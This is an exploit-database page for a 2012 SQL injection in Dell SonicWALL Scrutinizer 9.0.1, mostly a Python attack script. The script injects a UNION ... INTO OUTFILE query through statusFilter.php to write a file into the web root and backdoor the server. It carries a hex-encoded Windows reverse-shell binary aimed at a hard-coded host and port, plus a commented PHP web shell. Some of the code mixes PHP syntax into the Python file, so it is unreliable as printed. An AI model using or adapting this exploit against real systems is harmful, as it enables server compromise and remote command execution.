Dell SonicWALL Scrutinizer 9.0.1 (statusFilter.php q parameter) SQL Injection

2012-07-22 / 2012-07-23
Credit: muts
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/python ###################################################################################### # Exploit Title: Dell SonicWALL Scrutinizer 9.0.1 (statusFilter.php q parameter) SQL Injection # Date: Jul 22 2012 # Author: muts # Version: SonicWALL Scrutinizer 9.0.1 # Vendor URL: http://www.sonicwall.com # # Special thanks to: Tal Zeltzer # # Timeline: # # 12 Jun 2012: Vulnerability reported to CERT # 22 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012 # 22 Jul 2012: Public Disclosure # ###################################################################################### import sys,urllib2,urllib #php = "<?php echo system($_GET['c']); ?>" $rhost="172.16.164.1"; $lport=4444; function encode_ip($user_ip) { $ip = explode('.', $user_ip); return sprintf('%02x%02x%02x%02x', $ip[0], $ip[1], $ip[2], $ip[3]); } $string='4D5A900003Y004Y0FFFF0000B8YY00004ZZYY0BY000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24YY00005DCF9F8719AEF1D419AEF1D419AEF1D497B1E2D413AEF1D4E58EE3D418AEF1D45269636819AEF1D4YYY0504500004C0103000CF9E94FYYY0E0000F010B01050C0002Y006YY00001Y001Y002Y00004Y1Y0002Y4YYY4YYY04Y0004YY0002YY1Y1Y00001Y1YY0001YYYY0001C2Y3CZZZZZYYY0002Y1CZYYYY00002E74657874Y0B8Y0001Y0002Y004YYYYY0002Y602E72646174610000D4Y0002Y0002Y006YYYYY0004Y402E64617461Y00202Y03Y0002Y008YYYYY0004YCZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ066C7059E314000020066C705A0314000'. dechex($lport).'C705A2314000'. encode_ip($rhost). 'C705AE31400044Y0C705DA314Y01000068103040006801010000E86DY06A006A006A006A066A016A02E856Y08BF86A10689E31400057E853Y0893DE6314000893DEA314000893DEE31400068F231400068AE3140006A006A006A006A016A006A0068003040006A00E807Y06A00E806Y0FF2504204000FF2500204000FF2514204000FF250C204000FF2510204ZZZZZZZZZZZZZZZZZZZZZYYYYY0000862Y742YY000B02YBE2YA22YY000582YYYY0942Y002Y642YYYY0C82Y0C2ZYYY862Y742YY000B02YBE2YA22YY0004F0043726561746550726F636573734100009B004578697450726F63657373006B65726E656C33322E646C6C00004100575341536F636B657441000043005753415374617274757Y5600636F6E6E656374007773325F33322E646C6CZZZZZZZZZZZZZZZZZZZZ0000636D64ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZYYYYY000'; $a=str_replace("Z","000000000000000000000000000000",$string); $php=str_replace("Y","00000",$a); def exploit_mysql(target, phpScript): target += '/d4d/statusFilter.php' req = urllib2.Request(url = target) query = "AAA' " # First escape the sql query leaving everything valid # then we dump the php-script into the web-server's directory query += "union select 0x%s,0 into outfile 'C:\\\\Program Files\\\\Scrutinizer\\\\html\\\\my.php'" % phpScript.encode('hex') query += "#" # And finally we terminate the query values = { 'commonJson': 'protList', 'q': query } req.add_data(urllib.urlencode(values)) try: response = urllib2.urlopen(req) except: return(False) body = response.read() # print body if "No Results Found" in body: return(True) return(False) if len(sys.argv) != 2: print "Usage: " + sys.argv[0] + " " + "http://www.example.com:8080/" sys.exit(0) target = sys.argv[1] print '[*] Trying to SQL inject on %s' % target if exploit_mysql(target, php) == True: print '[*] Created a backdoor at %smy.php' % target urllib.urlopen('%smy.php' % target) else: print '[*] Failed to backdoor the server'

References:

http://www.sonicwall.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top